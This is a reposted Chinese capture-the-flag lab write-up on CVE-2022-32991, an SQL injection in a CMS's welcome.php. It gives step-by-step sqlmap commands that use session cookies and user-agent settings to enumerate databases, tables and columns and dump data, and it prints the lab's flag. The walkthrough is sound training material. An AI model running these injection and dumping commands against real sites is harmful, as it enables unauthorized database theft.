0


[春秋云镜] CVE-2022-32991 靶场详解

前期准备

工具

1.Burpsuite(对应java环境)

2.Sqlmap(对应python环境)

渗透测试

靶场提示

该CMS的welcome.php中存在SQL注入攻击

靶场实战

0x01 访问路径

0x02 注册用户并登入

0x03 url存在注入点

官方有提示:该CMS的welcome.php中存在SQL注入攻击。发现注入点。

0x04 获取cookie和user-agent

这存在两种方法,获取cookie是为了绕过身份验证,user-agent和random-agent主要是为了绕过客户端认证,否则容易被安全机制拦截。

方法一:抓包

点击第一个进去之后抓包

网页设置好代理->burpsuite设置代理->刷新页面

方法二:鼠标右键->检查->网络-> 刷新->找到第一个包,查看cookie和user-agent。

获取信息

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56
​
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669169499

0x05 sqlmap爆破

验证是否存在注入

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch

爆破数据库

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch --dbs

爆破表

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf --tables

爆破列

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf -T flag --columns

爆破字段

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf -T flag -C flag --dump

0x06 获得flag

 flag{e9dd7838-f6fe-4adf-a2a3-e7a49ed92a91}

总结

本次靶场主要考察的是对sql注入的用法,运用了一些sqlmap的参数对安全机制的绕过。

-p                       指定注入的参数
--batch                  使用默认方法去执行sql注入
--random-agent           随机更换请求头
--user-agent             使用指定的请求头
--cookie                 使用指定cookie

本文转载自: https://blog.csdn.net/weixin_60374959/article/details/127995976
版权归原作者 心"元"意“码” 所有, 如有侵权,请联系我们删除。

“[春秋云镜] CVE-2022-32991 靶场详解”的评论:

还没有评论